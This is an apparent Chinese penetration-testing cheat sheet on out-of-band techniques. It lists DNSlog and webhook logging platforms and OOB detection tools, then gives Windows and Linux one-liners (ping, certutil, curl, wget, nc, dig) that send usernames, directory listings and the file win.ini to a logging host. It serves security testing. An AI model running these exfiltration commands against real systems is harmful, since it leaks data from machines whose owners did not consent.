OOB
免责声明
本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.
相关文章
在线监控平台
http://ceye.io/
https://webhook.site
http://www.dnslog.cn/
https://iplogger.org/
https://log.xn--9tr.com/
相关工具
uknowsec/SharpNetCheck - 该工具可以在 dnslog 中回显内网 ip 地址和计算机名,可实现内网中的快速定位可出网机器
ztgrace/mole - 识别和利用out-of-band (OOB)漏洞的burp扩展
平台搭建
平台
BugScanTeam/DNSLog - DNSLog 是一款监控 DNS 解析记录和 HTTP 访问记录的工具
lanyi1998/DNSlog-GO - DNSLog-GO 是一款 golang 编写的监控 DNS 解析记录的工具,自带 WEB 界面
docker pull "sort/godnslog" docker run -p80:8080 -p53:53/udp "sort/godnslog" serve -domain yourdomain.com -4 100.100.100.100 # yourdomain.com 替换为你的域名 100.100.100.100 替换为你的公网IPyumusb/DNSLog-Platform-Golang - DNSLOG平台 golang 一键启动版
phith0n/conote-community - Conote 综合安全测试平台社区版
projectdiscovery/interactsh - An OOB interaction gathering server and client library
Buzz2d0/Hyuga - 一个用来检测带外(Out-of-Band)流量(DNS查询和HTTP请求)的监控工具
Li4n0/revsuit - RevSuit is a flexible and powerful reverse connection platform designed for receiving connection from target host in penetration.
Windows
ping
ping %USERNAME%.xxx.ceye.io ping -nc 4 %USERNAME%.xxx.ceye.iocertutil
使用 certutil 请求证书文件,并将下载文件重定向到 nul,无缓存、无需浏览器实现发起 http 请求
for /F %x in ('dir /b c:\') do certutil -urlcache -split -f "http://xxx.ceye.io/?result=%x" nulcurl
windows 环境默认是支持 curl 的
for /F %x in ('dir /b c:\') do curl http://xxx.ceye.io/%x curl -F file=@C:\windows\win.ini http://xxx.ceye.io
linux
curl
curl http://xxx.ceye.io/%xwget
wget http://xxx.ceye.io/%xping
linux 默认 ping 不带 -c 参数是会导致无限ping下去的,一定要带 -c
ping -c 4 xxx.ceye.io ping -nc 4 xxx.ceye.ioopenssl
openssl s_client -connect xxx.ceye.io:80nc
echo -e "GET / HTTP/1.1\nHost: http://xxx.ceye.io/%x\n\n" | nc xxx.ceye.io 80dig
dig xxx.ceye.io